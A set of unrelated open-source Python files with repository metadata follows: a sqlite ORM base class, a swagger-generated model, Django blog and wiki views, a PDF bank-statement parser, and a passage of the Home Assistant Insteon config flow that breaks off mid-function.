"id": "b021dbc5f7fa9e51b7301d547583cc519062b046",
"size": "760",
"binary": false,
"copies": "9",
"ref": "refs/heads/cwt",
"path": "scipy/weave/tests/test_standard_array_spec.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "C",
"bytes": "8532454"
},
{
"name": "C++",
"bytes": "6602032"
},
{
"name": "FORTRAN",
"bytes": "5895476"
},
{
"name": "Objective-C",
"bytes": "4346"
},
{
"name": "Python",
"bytes": "4776663"
},
{
"name": "Shell",
"bytes": "1742"
}
],
"symlink_target": ""
}
|
''' This class is only a model, to use it is necessary to extend it, and add
the table proprieties such name, columns, primary keys, etc...
The _columns atribute have to be initiated in the __init__(self, connection)
method, and when overwrite this method, is necessary execute the parent init
first:
parent().__init__(connection)
'''
import datetime
import copy
class DbTable:
    ''' Basic, ORM-like base class to manage table objects and data.

    This class is a model: subclasses define the table properties
    (``_table_name``, ``_primary``, ``_foreigh_keys``) and initialise
    ``self._columns`` in ``__init__`` after calling the parent ``__init__``.
    '''
    _table_name = ''        # table name
    _primary = []           # primary key column names
    _children_tables = {}   # tablename
    _foreigh_keys = {}      # {keyname: 'tablename.columnname'}
    _conn = None            # DB-API connection used for all operations

    def __init__(self, connection):
        ''' The table object has to receive a connection object to be
        initiated. '''
        # {cname: {'value': ..., 'type': ..., 'default': ...}}
        # if default == 'AUTO' the column will be autoincrement
        self._columns = {}
        # BUG FIX: the original condition was ``connection is connection``,
        # which is always true; compare against None instead.
        if connection is not None:
            self._conn = connection
        self._queued_to_save = False  # when True, values are read-only

    def set_value(self, cname, cvalue):
        ''' table.set_value(field_name, value) - add a value to field.

        Raises Exception for unknown columns or when the object is queued
        to save, and TypeError when the value has the wrong type. '''
        if self._queued_to_save:
            raise Exception(
                'Object queued to save, the values are readonly until save.')
        if cname not in self._columns.keys():
            raise Exception('The column ' + cname + ' is not found.')
        # bool columns also accept ints (sqlite stores booleans as integers)
        if (isinstance(cvalue, self._columns[cname]['type']) or
                (isinstance(cvalue, int) and
                 self._columns[cname]['type'] == bool)):
            self._columns[cname]['value'] = cvalue
        else:
            raise TypeError('Incorrect value type.')

    def get_value(self, cname):
        ''' table.get_value(field_name) - return the field value,
        or None for unknown columns. '''
        if cname in self._columns:
            return self._columns[cname]['value']
        return None

    def get_values(self, conj_cname):
        ''' Return {column: value} for every column in *conj_cname* whose
        current value is truthy. '''
        values = {}
        # BUG FIX: the original referenced an undefined name ``cname``
        # (a missing ``for`` loop) and raised NameError whenever called.
        for cname in conj_cname:
            value = self.get_value(cname)
            if value:
                values[cname] = value
        return values

    def find(self):
        ''' table.find()
        Search the table for the first row matching the values currently set
        on this object (via ``set_value``) and load that row into the object.
        Returns True when a row was found, False otherwise. '''
        select_query = {}
        for key, value in self._columns.items():
            # Autoincrement columns are only matched when explicitly set.
            if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'
                    ] or value['value']:
                select_query[key] = value['value']
        cursor = self._select_query(select_query)
        result = cursor.fetchone()
        if result:
            headers = {
                idx: desc[0]
                for idx, desc in enumerate(cursor.description)
            }
            for index, value in enumerate(result):
                self.set_value(headers[index], value)
            return True
        return False

    def list(self, query=None):
        ''' table.list({'field_name1': value1, 'field_name2': value2})
        Search the table for rows matching *query* (all rows when omitted)
        and return a list of populated table objects. '''
        # BUG FIX: avoid a mutable default argument shared between calls.
        if query is None:
            query = {}
        cursor = self._select_query(query)
        object_list = []
        headers = {idx: desc[0] for idx, desc in enumerate(cursor.description)}
        for i, row in enumerate(cursor.fetchall()):
            object_list.append(self.__class__(self._conn))
            for index, value in enumerate(row):
                object_list[i].set_value(headers[index], copy.copy(value))
        return object_list

    def save(self):
        ''' Persist the current values to the table and reload the saved
        row; returns the primary key value. '''
        if not self._queued_to_save:  # if not queued, lets queue!
            self.queue_to_save()
        self._conn.commit()
        self._queued_to_save = False  # committed; values writable again
        self.find()
        return self.get_value(self._primary[0])

    def queue_to_save(self):
        ''' Insert or update a table tuple value; returns the lastrowid. '''
        columns = []
        values = []
        for key, value in self._columns.items():
            # Skip unset autoincrement columns so sqlite assigns them.
            if str(value['default']).upper() not in ['AUTO', 'AUTOINCREMENT'
                    ] or value['value']:
                columns.append(key)
                values.append(value['value'])
        placeholders = ','.join(['?' for i in range(len(values))])
        query = 'INSERT OR REPLACE INTO {table} ({cols}) ' \
            'VALUES({placeholder})'.format(
                table=self._table_name,
                cols=','.join(columns),
                placeholder=placeholders)
        self._queued_to_save = True
        return self._conn.execute(query, values).lastrowid

    def check_table(self):
        ''' Check if the table exists; if not, create it. '''
        if not self._table_exists():
            self._create_table()

    def column_type(self, column_name):
        ''' Get the declared Python type of a column (None if unknown). '''
        if column_name in self._columns.keys():
            return self._columns[column_name]['type']
        return None

    def get_last_rowid(self):
        ''' Get the last ROWID of the primary key of the table. '''
        query = 'SELECT seq FROM sqlite_sequence WHERE name=?'
        return self._conn.execute(query, [self._table_name]).fetchone()[0]

    def _table_exists(self):
        ''' Check if this table exists in the database. '''
        query = 'SELECT name FROM sqlite_master WHERE type="table" AND name=?'
        return self._conn.execute(query, [self._table_name]).fetchone()\
            is not None

    def _create_table(self):
        ''' Create this table if it does not exist. '''
        columns_def = ''
        for key, value in self._columns.items():
            # columname datatype [primary key] [AUTOINCREMENT | DEFAULT ...]
            ctype = self._type_convert(value['type'])
            constraint = ''
            if key in self._primary:
                constraint += ' primary key'
            if value['default'] in ['AUTO', 'AUTOINCREMENT']:
                constraint += ' AUTOINCREMENT'
            else:
                constraint += ' DEFAULT {v1}'.format(v1=(
                    str(value['default']) if value['type'] is not str
                    else '"{v}"'.format(v=value['default'])
                ))
            columns_def += key + ' ' + ctype + constraint + ', '
        # BUG FIX: the original both prefixed and suffixed every FOREIGN KEY
        # clause with ', ', producing a double comma (a syntax error) when a
        # table declared more than one foreign key.
        fk_clauses = []
        for key, value in self._foreigh_keys.items():
            # FOREIGN KEY(trackartist) REFERENCES artist(artistid)
            table, column = value.split('.', 2)
            fk_clauses.append(
                'FOREIGN KEY({_key}) REFERENCES {_table}({_column})'.format(
                    _key=key,
                    _table=table,
                    _column=column))
        foreigh = (', ' + ', '.join(fk_clauses)) if fk_clauses else ''
        query = 'CREATE TABLE IF NOT EXISTS {table} ({coldef}{foreigh}) '.format(
            table=self._table_name,
            coldef=columns_def[:-2],
            foreigh=foreigh)
        cursor = self._conn.cursor()
        cursor.execute(query)
        self._conn.commit()

    def get_columns_name(self):
        ''' Return the column names. '''
        return self._columns.keys()

    def _type_convert(self, ctype):
        ''' Convert a Python type to the matching sqlite column type. '''
        ctypes = {
            'INTEGER': [int],
            'BOOLEAN': [bool],
            'REAL': [float],
            'TEXT': [str, datetime],
            'BLOB': [bytes]
        }
        for sqlite_type, python_types in ctypes.items():
            if ctype in python_types:
                return sqlite_type
        return 'BLOB'

    def _select_query(self, query):
        ''' Assemble and execute the SELECT query; returns the cursor. '''
        where_stmt = []
        values = []
        for key, value in query.items():
            if key in self._columns.keys():
                where_stmt.append(key + ' = ? ')
                values.append(value)
            else:
                # BUG FIX: the original referenced the undefined name
                # ``cname`` here, masking the real error with a NameError.
                raise Exception('The column ' + key + ' is not found.')
        nquery = 'SELECT {cols} FROM {table} {where}'.format(
            cols=", ".join(self._columns.keys()),
            table=self._table_name,
            where='WHERE ' + ' AND '.join(where_stmt) if len(
                where_stmt) else '')
        return self._conn.execute(nquery, values)
|
{
"content_hash": "8c071a152dd9af2f1fbab94636345706",
"timestamp": "",
"source": "github",
"line_count": 219,
"max_line_length": 79,
"avg_line_length": 38.57990867579909,
"alnum_prop": 0.5311871227364185,
"repo_name": "welblade/pyrom",
"id": "e7cadbd008dede08308458fe7ddc52786fbf7f6b",
"size": "8498",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "core/dbtable.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "54718"
}
],
"symlink_target": ""
}
|
"""
Copyright 2012 GroupDocs.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
class UpdateStorageProviderResult:
    """
    NOTE: Auto generated by the swagger code generator program; do not edit
    the class manually.
    """

    def __init__(self):
        # Swagger type map: this result type carries no payload fields.
        self.swaggerTypes = {}
|
{
"content_hash": "f89219d8ae3ab4a1f49be0827985a07a",
"timestamp": "",
"source": "github",
"line_count": 30,
"max_line_length": 77,
"avg_line_length": 28.366666666666667,
"alnum_prop": 0.6839012925969448,
"repo_name": "liosha2007/temporary-groupdocs-python-sdk",
"id": "c85777537ef8621a5c87edbb99cb3278bde8e1d4",
"size": "873",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "groupdocs/models/UpdateStorageProviderResult.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "1070081"
}
],
"symlink_target": ""
}
|
''' The internationalization handler '''
import gettext
TRANS = gettext.translation('tmppackages', 'locale', fallback=True)
_ = TRANS.ugettext
|
{
"content_hash": "3154ec31ea9ba84f1e3b60ab5879e825",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 67,
"avg_line_length": 24.166666666666668,
"alnum_prop": 0.7448275862068966,
"repo_name": "mweb/python_template_project",
"id": "292e249b3f65347cc20e4d197a16e9869d1043d7",
"size": "1743",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tmppackages/i18n.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "71455"
},
{
"name": "Shell",
"bytes": "517"
}
],
"symlink_target": ""
}
|
from django.http import HttpResponseRedirect, Http404, HttpResponse
from django.template import RequestContext, loader
from django.shortcuts import get_object_or_404, render_to_response
from django.contrib.auth.decorators import login_required
from django.views.generic.list_detail import object_list
from django.conf import settings
import sys
import threading # theme is passed thru thread local
from gitology.config import settings as gsettings
from gitology import utils
from gitology.document import Document
from gitology.d import forms
from gitology.d.utils import select_theme
gsettings.threadlocal = threading.local()
# TODO find out exactly why its considered a hacky solution
# }}}
# blog related views # {{{
# show_blog # {{{
@select_theme
def show_blog(request, blog_data):
    """Render the blog index: a paginated list of this blog's posts."""
    template_name = loader.select_template(
        ["blog/%s/index.html" % blog_data["name"], "blog/index.html"]
    ).name
    return object_list(
        request,
        queryset=blog_data["posts"],
        template_name=template_name,
        template_object_name="post",
        paginate_by=10,
        extra_context={'blog_data': blog_data},
    )
# }}}
# show_category # {{{
@select_theme
def show_category(request, blog_data, label_name):
    """Render a paginated list of the posts filed under *label_name*."""
    try:
        category_data = blog_data["labels"][label_name]
    except KeyError:
        raise Http404
    template_name = loader.select_template(
        ["blog/%s/category.html" % blog_data["name"], "blog/category.html"]
    ).name
    return object_list(
        request,
        queryset=category_data["posts"],
        template_name=template_name,
        template_object_name="post",
        paginate_by=10,
        extra_context={
            'blog_data': blog_data, 'category_data': category_data
        },
    )
# }}}
# show_post # {{{
@select_theme
def show_post(request):
    """Render a single blog post and accept comment submissions on it."""
    blog_data = utils.global_blog_dict[request.path]
    post = blog_data["posts"][request.path]
    remote_ip = request.META['REMOTE_ADDR']

    if request.method == "POST":
        form = forms.CommentForm(request, remote_ip, request.POST)
        if form.is_valid():
            # Redirect straight to the freshly created comment's anchor.
            anchor = "#comment%s" % form.save(post["document"]).gid()
            return HttpResponseRedirect(request.path + anchor)
    else:
        form = forms.CommentForm(request, remote_ip)

    candidate_templates = ["blog/%s/post.html" % blog_data["name"], "blog/post.html", ]
    return render_to_response(
        candidate_templates,
        {'blog_data': blog_data, 'post': post, 'form': form},
        context_instance=RequestContext(request)
    )
# }}}
def show_archive(request, blog_name, archive_format): pass
# }}}
# wiki related views # {{{
# show_wiki # {{{
@select_theme
def show_wiki(request):
    """Render a wiki page (with access control) and accept comments on it.

    Private pages are only visible to OpenIDs listed either in the page's
    own "viewers" metadata or in the repository-wide editors.txt file.
    """
    document = utils.global_wiki_dict[request.path]
    if document.meta.get("private"):
        # NOTE(review): Python-2 ``unicode`` call; request.openid is
        # presumably the authenticated OpenID -- confirm with middleware.
        if not unicode(request.openid) in (
            document.meta.get(
                "viewers", []
            ) + gsettings.LOCAL_REPO_PATH.joinpath(
                "editors.txt"
            ).read().split()
        ):
            # Hide the page's existence from unauthorized viewers.
            raise Http404
    remote_ip = request.META['REMOTE_ADDR']
    if request.method == "POST":
        form = forms.CommentForm(request, remote_ip, request.POST)
        if form.is_valid():
            # Jump to the new comment's anchor after saving it.
            chash = "#comment%s" % form.save(document).gid()
            return HttpResponseRedirect(request.path + chash)
    else:
        form = forms.CommentForm(request, remote_ip)
    # Page metadata may name its own template; fall back to the default.
    return render_to_response(
        [
            document.meta.get("template", "non_existant"),
            "wiki/page.html"
        ],
        { 'document': document, 'form': form },
        context_instance = RequestContext(request)
    )
# }}}
def add_comment(request, document_name): pass
def index(request): return HttpResponse("OK")
# }}}
@select_theme
def show_document(request, name):
    """Render an arbitrary document by name; local instances only."""
    if not settings.LOCAL_INSTANCE:
        raise Http404
    document = Document(name)
    if not document.exists():
        raise Http404
    context_instance = RequestContext(request)
    return render_to_response(
        "document.html",
        {'document': document},
        context_instance=context_instance,
    )
|
{
"content_hash": "f0294f04da4167e76e6639d967f734c9",
"timestamp": "",
"source": "github",
"line_count": 120,
"max_line_length": 79,
"avg_line_length": 33.108333333333334,
"alnum_prop": 0.6332746035741253,
"repo_name": "amitu/gitology",
"id": "ba9ad758c3a702ef5fff550e4d8950c419100b4e",
"size": "3989",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "src/gitology/d/views.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "145790"
}
],
"symlink_target": ""
}
|
import argparse
import codecs
import datetime
import json
import logging
import os.path
import subprocess
import tempfile
import inseven.finance
# Header tokens of the statement table exactly as pdf2json splits them
# (note the embedded trailing spaces -- they must match the node data).
PDF_TABLE_COLUMNS = ["Date", "Payment ", "type ", "and ", "details", "Paid ", "out", "Paid ", "in", "Balance"]
# Markers delimiting the transaction rows on each page.
PDF_TABLE_START = ["BALANCE ", "BROUGHT ", "FORWARD"]
PDF_TABLE_END = ["BALANCE ", "CARRIED ", "FORWARD"]
# Tolerance (in pdf2json "left" units) when assigning a node to a column.
PDF_POSITION_THRESHOLD = 20
def pdf2json(path):
    """Convert the PDF at *path* to JSON using the external pdf2json tool.

    Returns the parsed JSON document. Fix: the intermediate temp file was
    created with ``delete=False`` and never removed, leaking one file per
    call; it is now cleaned up once read. (``os`` is available via the
    module's ``import os.path``.)
    """
    with tempfile.NamedTemporaryFile(delete=False) as temp:
        subprocess.check_output(["/usr/local/bin/pdf2json", path, temp.name])
        try:
            with codecs.open(temp.name, "r", "ISO-8859-1") as f:
                return json.loads(f.read())
        finally:
            os.remove(temp.name)
def line_matches_offset(line, strings, offset):
    """Return True when *strings* matches the node data at *offset* in *line*."""
    for position, expected in enumerate(strings):
        try:
            node = line[position + offset]
        except IndexError:
            # Ran past the end of the line: cannot match.
            return False
        if node["data"] != expected:
            return False
    return True
def line_matches(line, strings):
    """Return True when *strings* occurs contiguously anywhere in *line*.

    Fix: replaced the Python-2-only ``xrange`` with ``range``. For these
    small windows the eager list built on Python 2 behaves identically,
    and the function now also runs on Python 3.
    """
    if len(line) < len(strings):
        return False
    for offset in range(0, len(line) - len(strings) + 1):
        if line_matches_offset(line, strings, offset):
            return True
    return False
def lines_between(lines, start, end):
    """Collect lines from the *start* marker (inclusive) up to the *end* marker."""
    collected = []
    collecting = False
    for current in lines:
        if line_matches(current, start):
            # The start marker itself is part of the result.
            collecting = True
            collected.append(current)
        elif line_matches(current, end):
            collecting = False
        elif collecting:
            collected.append(current)
    return collected
def format_number(text):
    """Parse a comma-grouped numeric string such as "1,234.56" into a float."""
    without_separators = text.replace(",", "")
    return float(without_separators)
def parse_page(page, date=None):
    """Extract bank-statement records from one pdf2json page.

    *date* carries the last seen transaction date across pages (rows omit
    the date when it repeats). Returns ``(records, date, starting_balance)``
    where starting_balance is taken from the BALANCE BROUGHT FORWARD row,
    or None when the page has no rows.
    """
    # Nodes arrive unordered; sort by vertical position first.
    nodes = sorted(page["text"], key=lambda x: x["top"])
    # Group the individual nodes into lines.
    lines = []
    top = 0
    line = []
    for node in nodes:
        if node["top"] != top:
            line = []
            lines.append(line)
            top = node["top"]
        line.append(node)
    # Determine the column offsets.
    # NOTE(review): indices 0,1,5,7,9 pick the Date/details/out/in/Balance
    # starts out of PDF_TABLE_COLUMNS; if the header row is absent,
    # ``details`` stays None and the loop below would raise -- confirm
    # every statement page carries the header.
    details = None
    for line in lines:
        if line_matches(line, PDF_TABLE_COLUMNS):
            details = [line[0]["left"], line[1]["left"], line[5]["left"], line[7]["left"], line[9]["left"]]
    # Filter out the lines we're interested in.
    statements = lines_between(lines, PDF_TABLE_START, PDF_TABLE_END)
    record = None
    results = []
    for line in statements:
        # Check to see if the row has changed.
        line = sorted(line, key=lambda x: x["left"])
        if line[0]["left"] == details[0] or line[0]["left"] == details[1] or record is None:
            record = inseven.finance.Record()
            results.append(record)
        # Process nodes for the current row.
        for node in line:
            logging.debug(line)
            left = node["left"]
            data = node["data"]
            # Columns are matched right-to-left with a positional tolerance.
            if left >= details[4] - PDF_POSITION_THRESHOLD:
                logging.debug("Parsing '%s'..." % data)
                # A trailing "D" marks the balance as a debit (negate it).
                if data == "D":
                    record.balance = -1 * record.balance
                else:
                    record.balance = format_number(data)
            elif left >= details[3] - PDF_POSITION_THRESHOLD:
                # Paid in.
                record.value = format_number(data)
            elif left >= details[2] - PDF_POSITION_THRESHOLD:
                # Paid out.
                record.value = (format_number(data) * -1)
            elif left >= details[1]:
                record.description = (record.description + " " + data).strip()
            elif left > details[0]:
                # Date continued mid-column: append to the running date text.
                date = (date + " " + data).strip()
            elif left == details[0]:
                date = data.strip()
            # Keep attempting to parse the date until we have a valid date.
            # NOTE(review): if no date column was seen yet, ``date`` is None
            # and strptime would raise TypeError (not caught) -- confirm the
            # first row of the first page always carries a date.
            try:
                record.date = datetime.datetime.strptime(date, "%d %b %y")
            except ValueError:
                pass
    if not len(results):
        return (results, date, None)
    # Check and retrieve the starting balance.
    balance = results.pop(0)
    assert balance.description == "BALANCE BROUGHT FORWARD", "Unable to determine starting balance."
    return (results, date, balance.balance)
def parse_pdf(path):
    """Parse every page of the statement PDF and reconcile running balances."""
    pages = pdf2json(path)

    records = []
    carry_date = None
    starting_balance = None
    for page in pages:
        # The date carries over between pages; the first page's brought-
        # forward balance becomes the reconciliation starting point.
        page_records, carry_date, page_balance = parse_page(page, carry_date)
        if starting_balance is None:
            starting_balance = page_balance
        records.extend(page_records)

    running_total = starting_balance
    for record in records:
        logging.debug("%s", record)
        running_total = running_total + record.value
        if record.balance is not None:
            assert abs(running_total - record.balance) < 0.0001, "Unable to reconcile balances"
    return records
|
{
"content_hash": "7490079ef3da96b3e3261977e5acdf55",
"timestamp": "",
"source": "github",
"line_count": 158,
"max_line_length": 111,
"avg_line_length": 29.848101265822784,
"alnum_prop": 0.5623409669211196,
"repo_name": "jbmorley/html-to-qif",
"id": "994d5c85d05e152211bd3c4afef65bb8012e89a3",
"size": "4739",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "inseven/sense.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "8539"
}
],
"symlink_target": ""
}
|
default_app_config = 'map.apps.MapConfig'
|
{
"content_hash": "ac5ed509342e0a047726338a50663de4",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 41,
"avg_line_length": 42,
"alnum_prop": 0.7619047619047619,
"repo_name": "jayArnel/crimemapping",
"id": "d6dc6afadca64b7cf44901cb1da8d878e3544eb9",
"size": "42",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "map/__init__.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Batchfile",
"bytes": "7772"
},
{
"name": "CSS",
"bytes": "152276"
},
{
"name": "HTML",
"bytes": "12541"
},
{
"name": "JavaScript",
"bytes": "61256"
},
{
"name": "Makefile",
"bytes": "7686"
},
{
"name": "Python",
"bytes": "64964"
}
],
"symlink_target": ""
}
|
"""Test config flow for Insteon."""
from __future__ import annotations
import logging
from pyinsteon import async_connect
import voluptuous as vol
from homeassistant import config_entries
from homeassistant.components import dhcp, usb
from homeassistant.const import (
CONF_ADDRESS,
CONF_DEVICE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_PORT,
CONF_USERNAME,
)
from homeassistant.core import callback
from homeassistant.data_entry_flow import FlowResult
from homeassistant.helpers.device_registry import format_mac
from homeassistant.helpers.dispatcher import async_dispatcher_send
from .const import (
CONF_HOUSECODE,
CONF_HUB_VERSION,
CONF_OVERRIDE,
CONF_UNITCODE,
CONF_X10,
DOMAIN,
SIGNAL_ADD_DEVICE_OVERRIDE,
SIGNAL_ADD_X10_DEVICE,
SIGNAL_REMOVE_DEVICE_OVERRIDE,
SIGNAL_REMOVE_X10_DEVICE,
)
from .schemas import (
add_device_override,
add_x10_device,
build_device_override_schema,
build_hub_schema,
build_plm_schema,
build_remove_override_schema,
build_remove_x10_schema,
build_x10_schema,
)
# Step identifiers for the individual config/options-flow forms.
STEP_PLM = "plm"
STEP_HUB_V1 = "hubv1"
STEP_HUB_V2 = "hubv2"
STEP_CHANGE_HUB_CONFIG = "change_hub_config"
STEP_ADD_X10 = "add_x10"
STEP_ADD_OVERRIDE = "add_override"
STEP_REMOVE_OVERRIDE = "remove_override"
STEP_REMOVE_X10 = "remove_x10"
# Form key and human-readable labels for the modem-type selection list.
MODEM_TYPE = "modem_type"
PLM = "PowerLinc Modem (PLM)"
HUB1 = "Hub version 1 (pre-2014)"
HUB2 = "Hub version 2"
_LOGGER = logging.getLogger(__name__)
def _only_one_selected(*args):
"""Test if only one item is True."""
return sum(args) == 1
async def _async_connect(**kwargs):
    """Connect to the Insteon modem."""
    try:
        await async_connect(**kwargs)
    except ConnectionError:
        _LOGGER.error("Could not connect to Insteon modem")
        return False
    _LOGGER.info("Connected to Insteon modem")
    return True
def _remove_override(address, options):
    """Remove a device override from config."""
    # Everything except the override matching *address* survives.
    remaining = [
        override
        for override in options[CONF_OVERRIDE]
        if override[CONF_ADDRESS] != address
    ]
    new_options = {}
    if options.get(CONF_X10):
        new_options[CONF_X10] = options.get(CONF_X10)
    if remaining:
        new_options[CONF_OVERRIDE] = remaining
    return new_options
def _remove_x10(device, options):
    """Remove an X10 device from the config."""
    # NOTE(review): *device* is a display string; index 11 is assumed to be
    # the housecode character and everything from index 24 on the unit
    # number. These magic offsets depend on the exact label format built
    # by the remove-X10 schema -- confirm against build_remove_x10_schema.
    housecode = device[11].lower()
    unitcode = int(device[24:])
    new_options = {}
    # Preserve any existing device overrides untouched.
    if options.get(CONF_OVERRIDE):
        new_options[CONF_OVERRIDE] = options.get(CONF_OVERRIDE)
    new_x10 = []
    for existing_device in options[CONF_X10]:
        if (
            existing_device[CONF_HOUSECODE].lower() != housecode
            or existing_device[CONF_UNITCODE] != unitcode
        ):
            new_x10.append(existing_device)
    if new_x10:
        new_options[CONF_X10] = new_x10
    return new_options, housecode, unitcode
class InsteonFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
    """Insteon config flow handler."""
    # Device path/name captured during USB discovery for the confirm step.
    _device_path: str | None = None
    _device_name: str | None = None
    # Connection values pre-filled by DHCP discovery.
    # NOTE(review): mutable class-level dict is shared across instances
    # until an instance assigns its own -- async_step_dhcp does reassign.
    discovered_conf: dict[str, str] = {}
    @staticmethod
    @callback
    def async_get_options_flow(
        config_entry: config_entries.ConfigEntry,
    ) -> InsteonOptionsFlowHandler:
        """Define the config flow to handle options."""
        return InsteonOptionsFlowHandler(config_entry)
    async def async_step_user(self, user_input=None):
        """Init the config flow."""
        errors = {}
        # Only a single Insteon modem is supported per installation.
        if self._async_current_entries():
            return self.async_abort(reason="single_instance_allowed")
        if user_input is not None:
            # Branch to the flow step matching the chosen modem type.
            selection = user_input.get(MODEM_TYPE)
            if selection == PLM:
                return await self.async_step_plm()
            if selection == HUB1:
                return await self.async_step_hubv1()
            return await self.async_step_hubv2()
        modem_types = [PLM, HUB1, HUB2]
        data_schema = vol.Schema({vol.Required(MODEM_TYPE): vol.In(modem_types)})
        return self.async_show_form(
            step_id="user", data_schema=data_schema, errors=errors
        )
    async def async_step_plm(self, user_input=None):
        """Set up the PLM modem type."""
        errors = {}
        if user_input is not None:
            # Only create the entry once a real connection succeeds.
            if await _async_connect(**user_input):
                return self.async_create_entry(title="", data=user_input)
            errors["base"] = "cannot_connect"
        # Re-show the form pre-filled with the failed input, if any.
        schema_defaults = user_input if user_input is not None else {}
        data_schema = build_plm_schema(**schema_defaults)
        return self.async_show_form(
            step_id=STEP_PLM, data_schema=data_schema, errors=errors
        )
    async def async_step_hubv1(self, user_input=None):
        """Set up the Hub v1 modem type."""
        return await self._async_setup_hub(hub_version=1, user_input=user_input)
    async def async_step_hubv2(self, user_input=None):
        """Set up the Hub v2 modem type."""
        return await self._async_setup_hub(hub_version=2, user_input=user_input)
    async def _async_setup_hub(self, hub_version, user_input):
        """Set up the Hub versions 1 and 2."""
        errors = {}
        if user_input is not None:
            user_input[CONF_HUB_VERSION] = hub_version
            if await _async_connect(**user_input):
                return self.async_create_entry(title="", data=user_input)
            # Strip the injected key again so the re-shown form only
            # contains what the user actually typed.
            user_input.pop(CONF_HUB_VERSION)
            errors["base"] = "cannot_connect"
        # Fall back to DHCP-discovered values when there is no user input.
        schema_defaults = user_input if user_input is not None else self.discovered_conf
        data_schema = build_hub_schema(hub_version=hub_version, **schema_defaults)
        step_id = STEP_HUB_V2 if hub_version == 2 else STEP_HUB_V1
        return self.async_show_form(
            step_id=step_id, data_schema=data_schema, errors=errors
        )
    async def async_step_import(self, import_info):
        """Import a yaml entry as a config entry."""
        if self._async_current_entries():
            return self.async_abort(reason="single_instance_allowed")
        if not await _async_connect(**import_info):
            return self.async_abort(reason="cannot_connect")
        return self.async_create_entry(title="", data=import_info)
    async def async_step_usb(self, discovery_info: usb.UsbServiceInfo) -> FlowResult:
        """Handle USB discovery."""
        if self._async_current_entries():
            return self.async_abort(reason="single_instance_allowed")
        # Resolve the stable /dev/serial/by-id path off the event loop.
        dev_path = await self.hass.async_add_executor_job(
            usb.get_serial_by_id, discovery_info.device
        )
        self._device_path = dev_path
        self._device_name = usb.human_readable_device_name(
            dev_path,
            discovery_info.serial_number,
            discovery_info.manufacturer,
            discovery_info.description,
            discovery_info.vid,
            discovery_info.pid,
        )
        self._set_confirm_only()
        self.context["title_placeholders"] = {
            CONF_NAME: f"Insteon PLM {self._device_name}"
        }
        await self.async_set_unique_id(config_entries.DEFAULT_DISCOVERY_UNIQUE_ID)
        return await self.async_step_confirm_usb()
    async def async_step_confirm_usb(self, user_input=None):
        """Confirm a USB discovery."""
        if user_input is not None:
            # Treat the discovered serial device as a PLM.
            return await self.async_step_plm({CONF_DEVICE: self._device_path})
        return self.async_show_form(
            step_id="confirm_usb",
            description_placeholders={CONF_NAME: self._device_name},
        )
    async def async_step_dhcp(self, discovery_info: dhcp.DhcpServiceInfo) -> FlowResult:
        """Handle a DHCP discovery."""
        # Pre-fill the hub host for the later hub setup steps.
        self.discovered_conf = {CONF_HOST: discovery_info.ip}
        self.context["title_placeholders"] = {
            CONF_NAME: f"Insteon Hub {discovery_info.ip}"
        }
        await self.async_set_unique_id(format_mac(discovery_info.macaddress))
        return await self.async_step_user()
class InsteonOptionsFlowHandler(config_entries.OptionsFlow):
    """Handle an Insteon options flow."""
    def __init__(self, config_entry: config_entries.ConfigEntry) -> None:
        """Init the InsteonOptionsFlowHandler class."""
        self.config_entry = config_entry
    async def async_step_init(self, user_input=None):
        """Init the options config flow."""
        errors = {}
        if user_input is not None:
            change_hub_config = user_input.get(STEP_CHANGE_HUB_CONFIG, False)
            device_override = user_input.get(STEP_ADD_OVERRIDE, False)
            x10_device = user_input.get(STEP_ADD_X10, False)
            remove_override = user_input.get(STEP_REMOVE_OVERRIDE, False)
            remove_x10 = user_input.get(STEP_REMOVE_X10, False)
            # Exactly one action may be picked per pass through this menu.
            if _only_one_selected(
                change_hub_config,
                device_override,
                x10_device,
                remove_override,
                remove_x10,
            ):
                if change_hub_config:
                    return await self.async_step_change_hub_config()
                if device_override:
                    return await self.async_step_add_override()
                if x10_device:
                    return await self.async_step_add_x10()
                if remove_override:
                    return await self.async_step_remove_override()
                if remove_x10:
                    return await self.async_step_remove_x10()
            errors["base"] = "select_single"
        # Build the menu dynamically: hub config only for hub entries,
        # removal options only when something exists to remove.
        data_schema = {
            vol.Optional(STEP_ADD_OVERRIDE): bool,
            vol.Optional(STEP_ADD_X10): bool,
        }
        if self.config_entry.data.get(CONF_HOST):
            data_schema[vol.Optional(STEP_CHANGE_HUB_CONFIG)] = bool
        options = {**self.config_entry.options}
        if options.get(CONF_OVERRIDE):
            data_schema[vol.Optional(STEP_REMOVE_OVERRIDE)] = bool
        if options.get(CONF_X10):
            data_schema[vol.Optional(STEP_REMOVE_X10)] = bool
        return self.async_show_form(
            step_id="init", data_schema=vol.Schema(data_schema), errors=errors
        )
    async def async_step_change_hub_config(self, user_input=None):
        """Change the Hub configuration."""
        if user_input is not None:
            data = {
                **self.config_entry.data,
                CONF_HOST: user_input[CONF_HOST],
                CONF_PORT: user_input[CONF_PORT],
            }
            # Only Hub v2 uses credentials.
            if self.config_entry.data[CONF_HUB_VERSION] == 2:
